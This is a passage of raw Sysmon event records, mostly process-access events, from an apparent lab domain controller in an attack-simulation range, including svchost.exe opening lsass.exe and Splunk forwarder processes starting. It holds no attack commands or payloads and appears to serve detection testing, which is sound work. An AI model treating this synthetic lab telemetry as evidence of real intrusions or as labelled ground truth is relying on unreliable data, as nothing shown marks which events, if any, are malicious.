12:01:11.111{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002983Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:11.111{266CAFBE-6469-6064-0500-00000000AE01}624640C:\Windows\system32\csrss.exe{266CAFBE-6486-6064-7500-00000000AE01}4492C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000002982Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:11.111{266CAFBE-647D-6064-2F00-00000000AE01}27964104C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{266CAFBE-6486-6064-7500-00000000AE01}4492C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000002981Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:10.900{266CAFBE-6486-6064-7500-00000000AE01}4492C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{266CAFBE-646A-6064-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{266CAFBE-647D-6064-2F00-00000000AE01}2796C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000002980Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:11.111{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-646A-6064-0B00-00000000AE01}856C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002979Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:11.111{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-646A-6064-0B00-00000000AE01}856C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002978Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:11.111{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-646A-6064-0B00-00000000AE01}856C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000003021Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:12.893{266CAFBE-647E-6064-3D00-00000000AE01}37963816C:\Windows\system32\conhost.exe{266CAFBE-6488-6064-7700-00000000AE01}4556C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000003020Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:12.893{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000003019Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:12.893{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000003018Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:12.893{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000003017Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:12.893{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000003016Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:12.893{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000003015Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:12.893{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000003014Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:12.893{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000003013Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:12.893{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000003012Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:12.893{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000003011Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:12.893{266CAFBE-6469-6064-0500-00000000AE01}624640C:\Windows\system32\csrss.exe{266CAFBE-6488-6064-7700-00000000AE01}4556C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000003010Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:12.893{266CAFBE-647D-6064-2F00-00000000AE01}27964104C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{266CAFBE-6488-6064-7700-00000000AE01}4556C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000003009Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:12.681{266CAFBE-6488-6064-7700-00000000AE01}4556C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{266CAFBE-646A-6064-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{266CAFBE-647D-6064-2F00-00000000AE01}2796C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 354300x80000000000000003008Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:09.886{266CAFBE-647D-6064-3200-00000000AE01}2716C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1win-dc-892.attackrange.local53domainfalse127.0.0.1win-dc-892.attackrange.local54223- 10341000x80000000000000003007Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:12.002{266CAFBE-647E-6064-3D00-00000000AE01}37963816C:\Windows\system32\conhost.exe{266CAFBE-6487-6064-7600-00000000AE01}4528C:\Program Files\SplunkUniversalForwarder\bin\splunk-perfmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000003006Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:12.002{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000003005Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:12.002{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000003004Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:12.002{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000003003Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:12.002{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000003002Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:12.002{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000003001Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 